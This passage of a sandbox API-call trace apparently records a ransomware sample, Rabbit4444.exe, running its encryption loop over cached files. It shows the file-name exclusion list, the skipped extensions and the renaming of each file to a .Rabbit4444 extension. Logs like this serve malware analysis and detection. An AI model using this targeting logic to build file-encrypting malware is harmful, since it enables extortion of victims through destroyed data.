lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0067.860] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.860] CloseHandle (hObject=0x29c) returned 1 [0067.860] CloseHandle (hObject=0x280) returned 1 [0067.860] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}.Rabbit4444") returned 156 [0067.860] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3ce017fd-e6da-4e49-a4d3-f69a0e563d90}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3ce017fd-e6da-4e49-a4d3-f69a0e563d90}.rabbit4444"), dwFlags=0x1) returned 1 [0067.861] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98965b15, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98965b15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x41d8710a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", cAlternateFileName="{3DB05~1")) returned 1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="Rabbit4444.exe") returned -1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2=".") returned 1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="..") returned 1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="windows") returned -1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="bootmgr") returned -1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="pagefile.sys") returned -1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="boot") returned -1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="ids.txt") returned -1 [0067.861] lstrcmpiW (lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", lpString2="NTUSER.DAT") returned -1 [0067.861] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}" | out: lpString1="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}") returned="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}" [0067.861] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3DB05D28-F3C3-449E-B7A6-31F664B2660E}", dwFileAttributes=0x0) returned 1 [0067.862] lstrlenW (lpString="{3DB05D28-F3C3-449E-B7A6-31F664B2660E}") returned 38 [0067.862] lstrlenW (lpString="Rabbit4444") returned 10 [0067.862] lstrcmpiW (lpString1="664B2660E}", lpString2="Rabbit4444") returned -1 [0067.862] lstrlenW (lpString=".dll") returned 4 [0067.862] lstrcmpiW (lpString1="60E}", lpString2=".dll") returned 1 [0067.862] lstrlenW (lpString=".lnk") returned 4 [0067.862] lstrcmpiW (lpString1="60E}", lpString2=".lnk") returned 1 [0067.862] lstrlenW (lpString=".ini") returned 4 [0067.862] lstrcmpiW (lpString1="60E}", lpString2=".ini") returned 1 [0067.862] lstrlenW (lpString=".sys") returned 4 [0067.862] lstrcmpiW (lpString1="60E}", lpString2=".sys") returned 1 [0067.862] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3DB05D28-F3C3-449E-B7A6-31F664B2660E}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3db05d28-f3c3-449e-b7a6-31f664b2660e}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.862] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.862] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15917313409) returned 1 [0067.862] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0067.863] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.864] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.865] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15917573129) returned 1 [0067.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0067.865] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.865] CloseHandle (hObject=0x29c) returned 1 [0067.865] CloseHandle (hObject=0x280) returned 1 [0067.865] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3DB05D28-F3C3-449E-B7A6-31F664B2660E}.Rabbit4444") returned 156 [0067.865] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3DB05D28-F3C3-449E-B7A6-31F664B2660E}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3db05d28-f3c3-449e-b7a6-31f664b2660e}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3DB05D28-F3C3-449E-B7A6-31F664B2660E}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3db05d28-f3c3-449e-b7a6-31f664b2660e}.rabbit4444"), dwFlags=0x1) returned 1 [0067.866] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98d6baad, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98d6baad, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x41d8710a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", cAlternateFileName="{4A8A0~1")) returned 1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="Rabbit4444.exe") returned -1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2=".") returned 1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="..") returned 1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="windows") returned -1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="bootmgr") returned -1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="pagefile.sys") returned -1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="boot") returned -1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="ids.txt") returned -1 [0067.866] lstrcmpiW (lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", lpString2="NTUSER.DAT") returned -1 [0067.866] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}" | out: lpString1="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}") returned="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}" [0067.866] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}", dwFileAttributes=0x0) returned 1 [0067.867] lstrlenW (lpString="{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}") returned 38 [0067.867] lstrlenW (lpString="Rabbit4444") returned 10 [0067.867] lstrcmpiW (lpString1="F7956552D}", lpString2="Rabbit4444") returned -1 [0067.867] lstrlenW (lpString=".dll") returned 4 [0067.867] lstrcmpiW (lpString1="52D}", lpString2=".dll") returned 1 [0067.867] lstrlenW (lpString=".lnk") returned 4 [0067.867] lstrcmpiW (lpString1="52D}", lpString2=".lnk") returned 1 [0067.867] lstrlenW (lpString=".ini") returned 4 [0067.867] lstrcmpiW (lpString1="52D}", lpString2=".ini") returned 1 [0067.867] lstrlenW (lpString=".sys") returned 4 [0067.867] lstrcmpiW (lpString1="52D}", lpString2=".sys") returned 1 [0067.867] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4a8a0b51-d1cb-4b42-a15c-6a3f7956552d}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.867] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.867] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15917871984) returned 1 [0067.868] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.868] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0067.868] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0067.868] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.870] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.871] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15918212388) returned 1 [0067.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0067.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0067.871] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.872] CloseHandle (hObject=0x29c) returned 1 [0067.872] CloseHandle (hObject=0x280) returned 1 [0067.872] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}.Rabbit4444") returned 156 [0067.872] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4a8a0b51-d1cb-4b42-a15c-6a3f7956552d}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4A8A0B51-D1CB-4B42-A15C-6A3F7956552D}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4a8a0b51-d1cb-4b42-a15c-6a3f7956552d}.rabbit4444"), dwFlags=0x1) returned 1 [0067.872] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3817298a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3817298a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41d8710a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", cAlternateFileName="{4BCD2~1")) returned 1 [0067.872] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="Rabbit4444.exe") returned -1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2=".") returned 1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="..") returned 1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="windows") returned -1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="bootmgr") returned -1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="pagefile.sys") returned -1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="boot") returned -1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="ids.txt") returned -1 [0067.873] lstrcmpiW (lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", lpString2="NTUSER.DAT") returned -1 [0067.873] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}" | out: lpString1="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}") returned="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}" [0067.873] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}", dwFileAttributes=0x0) returned 1 [0067.873] lstrlenW (lpString="{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}") returned 38 [0067.873] lstrlenW (lpString="Rabbit4444") returned 10 [0067.873] lstrcmpiW (lpString1="0783A3EC4}", lpString2="Rabbit4444") returned -1 [0067.873] lstrlenW (lpString=".dll") returned 4 [0067.873] lstrcmpiW (lpString1="EC4}", lpString2=".dll") returned 1 [0067.873] lstrlenW (lpString=".lnk") returned 4 [0067.873] lstrcmpiW (lpString1="EC4}", lpString2=".lnk") returned 1 [0067.873] lstrlenW (lpString=".ini") returned 4 [0067.873] lstrcmpiW (lpString1="EC4}", lpString2=".ini") returned 1 [0067.873] lstrlenW (lpString=".sys") returned 4 [0067.873] lstrcmpiW (lpString1="EC4}", lpString2=".sys") returned 1 [0067.873] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4bcd2f54-44ae-4e42-b58f-3090783a3ec4}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.874] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.874] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15918460399) returned 1 [0067.874] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0067.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0067.874] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.875] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.877] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15918744877) returned 1 [0067.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0067.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0067.877] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.877] CloseHandle (hObject=0x29c) returned 1 [0067.877] CloseHandle (hObject=0x280) returned 1 [0067.877] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}.Rabbit4444") returned 156 [0067.877] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4bcd2f54-44ae-4e42-b58f-3090783a3ec4}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4BCD2F54-44AE-4E42-B58F-3090783A3EC4}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4bcd2f54-44ae-4e42-b58f-3090783a3ec4}.rabbit4444"), dwFlags=0x1) returned 1 [0067.878] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98965b15, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98965b15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x41d8710a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", cAlternateFileName="{4CCC5~1")) returned 1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="Rabbit4444.exe") returned -1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2=".") returned 1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="..") returned 1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="windows") returned -1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="bootmgr") returned -1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="pagefile.sys") returned -1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="boot") returned -1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="ids.txt") returned -1 [0067.878] lstrcmpiW (lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", lpString2="NTUSER.DAT") returned -1 [0067.878] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}" | out: lpString1="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}") returned="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}" [0067.878] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4CCC5AFB-555C-44D5-892C-F0F2617C631D}", dwFileAttributes=0x0) returned 1 [0067.879] lstrlenW (lpString="{4CCC5AFB-555C-44D5-892C-F0F2617C631D}") returned 38 [0067.879] lstrlenW (lpString="Rabbit4444") returned 10 [0067.879] lstrcmpiW (lpString1="2617C631D}", lpString2="Rabbit4444") returned -1 [0067.879] lstrlenW (lpString=".dll") returned 4 [0067.879] lstrcmpiW (lpString1="31D}", lpString2=".dll") returned 1 [0067.879] lstrlenW (lpString=".lnk") returned 4 [0067.879] lstrcmpiW (lpString1="31D}", lpString2=".lnk") returned 1 [0067.879] lstrlenW (lpString=".ini") returned 4 [0067.879] lstrcmpiW (lpString1="31D}", lpString2=".ini") returned 1 [0067.879] lstrlenW (lpString=".sys") returned 4 [0067.879] lstrcmpiW (lpString1="31D}", lpString2=".sys") returned 1 [0067.879] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4CCC5AFB-555C-44D5-892C-F0F2617C631D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4ccc5afb-555c-44d5-892c-f0f2617c631d}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.879] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.879] QueryPerformanceCounter (in: 